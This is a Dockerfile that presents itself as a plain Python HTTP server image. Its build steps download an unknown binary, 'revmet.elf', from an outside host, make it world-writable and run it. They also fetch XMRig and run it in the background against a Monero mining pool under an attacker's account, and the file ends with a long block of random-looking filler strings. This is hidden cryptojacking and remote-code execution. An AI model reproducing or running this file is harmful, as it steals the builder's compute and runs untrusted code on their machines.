FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo uIT6AE8srswjpST5c2GVzbccQOtfeROs zvZjyBwBtDVi7mnaLVoaOWVO79hK25Cp fJIs31mj1yOOWxWbDhZg5gYaYHvRdDAy pKYDY5GbY6Jdb8BX8LFkPKO8AVH6UseJ ptdWTlFHX5rOxp5ZrBBHpijz8FqNamIq lZPJpRI4CS9Hjs13xgA1vEpTvfx7D9Xj tMWT0DigDdogenv5xfk1OqKkzOoSa3Lr m1tdRy7fyD2a1DkfE9QrX7FbjKgvvtMZ vEkelHOT6y83dHR08C9lSeIWCZ9YQkRX fByLDBeRWTc9XFCRXuAt5sUKPyPjzAhj miQUIfKtvSSgXxvOk6ZXNwu6Z4gGPp1Y DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]